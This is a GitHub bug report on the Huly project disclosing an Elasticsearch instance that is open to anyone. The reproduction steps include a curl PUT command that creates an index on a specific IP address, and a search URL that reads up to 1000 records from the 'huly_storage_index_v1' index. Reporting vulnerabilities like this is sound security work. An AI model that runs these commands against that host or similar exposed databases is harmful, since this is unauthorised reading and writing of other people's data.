Elasticsearch instance unprotected, thus allowing an attacker to perform write/read operations on the database huly #7508

Open
shadihh9 opened this issue Dec 19, 2024 · 0 comments

Description of the issue

A clear and concise description of the issue.
I found a bug: the Elasticsearch instance is unprotected, thus allowing an attacker to perform write/read operations on the Huly database.

Your environment

  • Version of Huly
  • Browser (and version)
  • Your operating system (and version)

Steps to reproduce

Please produce the steps for us to reproduce this issue.
1. To exploit the bug and create a PoC in the DB, I used the following on Linux:

curl -XPUT 'http://23.94.180.12:9200/poc3'

and see the PoC created in the DB:
http://23.94.180.12:9200/poc3
Then go to http://23.94.180.12:9200/huly_storage_index_v1/_search?size=1000 and see "huly" in the URL, which means it belongs to the company.

Expected behaviour

Tell us what should happen.

Actual behaviour

Tell us what happens instead (include screenshots or logs).
Thus allowing an attacker to perform write/read operations on Huly.

Possible solutions

(Not obligatory)
If you know how to fix the bug, please describe your solution here.
